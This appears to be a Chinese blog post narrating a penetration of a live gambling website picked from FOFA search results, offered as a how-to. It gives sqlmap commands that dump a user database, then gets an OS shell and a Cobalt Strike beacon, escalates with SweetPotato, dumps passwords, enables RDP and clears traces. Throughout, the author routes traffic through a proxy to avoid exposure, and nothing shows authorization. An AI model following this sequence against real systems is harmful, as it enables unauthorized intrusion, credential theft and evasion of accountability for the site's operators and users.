免责声明
0x01 概述
本文章来自知识星球成员yemur的投稿,感谢。
本次渗透仅为技术研究,请勿用于非法破坏,一切后果与我方无关。
0x02 正文
FOFA搜索
使用知识星球内部的FOFA在线搜索系统收集一些站点
搜索结果如下:
这里随便从其中选取一个站点做测试对象,打开页面如下
尝试使用弱口令登录
admin/admin
admin/123456
.....................
弱口令失败,那么开始尝试万能密码的sql注入。众所周知该类网站的登录基本上都有sql注入。那么我们现在先抓取登录的数据包。
其中*代表注入点,然后将其保存为sql.txt,直接用sqlmap的-r参数跑即可。不过在此之前先配置一个代理,避免暴露自己。
在proxfier上先添加一个代理服务器
其中代理端口为你clash的端口,地址为127.0.0.1,接下来配置代理规则,根据自己的需要进行配置,我这里只配置了python和chrome的代理
使用py测试一下代理是否配置成功,py脚本代码如下
import requests
url="http://myip.ipip.net/"
header={
"User-Agent":"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
}
resp=requests.get(url=url,verify=False,headers=header)
resp.encoding="utf-8"
print(resp.text)
响应如下
接下来执行sqlmap的命令
python3 sqlmap.py -r sql.txt -D --tables --batch --threads 8
运行结果如下
接下来报表
python3 sqlmap.py -r sql.txt -D RYPlatformManagerDB --tables --batch --threads 8
爆字段
python3 sqlmap.py -r sql.txt -D RYPlatformManagerDB -T Base_Users --dump --batch --threads 8
将其密码拿到cmd5去解码
只因我没有小钱钱买MD5付费查询,免费站点又解不出来,gg了,换一种思路,使用sqlmap的--os-shell参数来执行命令让其上线cs
python3 sqlmap.py -r sql.txt --batch --threads 8 --os-shell
十分顺利,这里直接使用使用cs生成payload
payload类型选择如下
然后生成payload,将其在sqlmap中执行
成功上线
尝试提权,先使用命令查看系统信息,查看合适的提权方法
shell systeminfo
查找对应exp
这里最后发现使用SweetPotato可以成功提权,原因后面说。。。。。。。。。。。。。。。
使用Sweet Potato反弹一个system权限回来
成功反弹回system权限,那么我们按照一般的内网流程行动(大部分情况下都只是工作组),刚刚执行systeminfo时就发现这个站点不存在域,所以我们可以到此为止。。。假的,来都来了,开个3389上去看看再说。在system权限的会话中抓取密码
成功抓取到密码,密码强度可谓是非常之强。。。。。。20多位的密码
接下来使用system权限的会话开启3389即可
开启成功,这里就直接使用刚刚抓取到的账户和密码进行登录。登录成功
下面这个腾讯管家搞得我差点提权失败。。。包括上线。。。。。。
这要真是失败了就得拿出我的免杀大杀器了,可惜没有排上用场哈哈哈
使用各种痕迹清除工具将渗透清除(每次渗透完一定要清除痕迹),后来发现此机器并无域控,至此渗透之旅结束收工。
0x03 知识星球
原文始发于微信公众号(狐狸说安全):痛恨还是爱了?教你如何快速拿下一个BC小站
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论